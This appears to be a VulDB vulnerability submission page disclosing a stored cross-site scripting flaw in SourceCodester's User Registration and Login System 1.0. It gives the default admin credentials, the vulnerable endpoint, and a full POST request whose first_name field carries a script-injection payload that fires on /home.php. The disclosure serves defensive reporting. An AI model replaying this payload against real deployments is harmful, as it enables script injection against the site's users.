Submit #246053: https://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacksinfo

Titelhttps://www.sourcecodester.com/php/16890/user-registration-and-l User Registration and Login System 1.0 Cross-site Scripting attacks
BeschreibungBUG_Author: hlhyp vendors: https://www.sourcecodester.com/php/16890/user-registration-and-login-system-using-php-source-code.html username && password : admin/admin Vulnerability File: /endpoint/add-user.php ;/home.php [+] payload: contact_number=1&email=testing%40example.com&first_name=LgyxmpHT--><ScRiPt%20>alert(9221)</ScRiPt><!--&last_name=LgyxmpHT&password=u]H[ww6KrA9F.x-F&username=LgyxmpHT First: POST /endpoint/add-user.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/ Content-Length: 164 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: 127.0.0.1 Connection: Keep-alive contact_number=1&email=testing%40example.com&first_name=LgyxmpHT--><ScRiPt%20>alert(9221)</ScRiPt><!--&last_name=LgyxmpHT&password=u]H[ww6KrA9F.x-F&username=LgyxmpHT Then access /home.php will alert message
Quelle⚠️ https://github.com/qqisee/vulndis/blob/main/xss_add_user.md
Benutzer
 hlhyp (UID 59415)
Einreichung01.12.2023 09:30 (vor 3 Jahren)
Moderieren01.12.2023 17:05 (8 hours later)
StatusAkzeptiert
VulDB Eintrag246613 [SourceCodester User Registration and Login System 1.0 /endpoint/add-user.php first_name Cross Site Scripting]
Punkte20

ZurückÜbersichtWeiter

Want to know what is going to be exploited?

We predict KEV entries!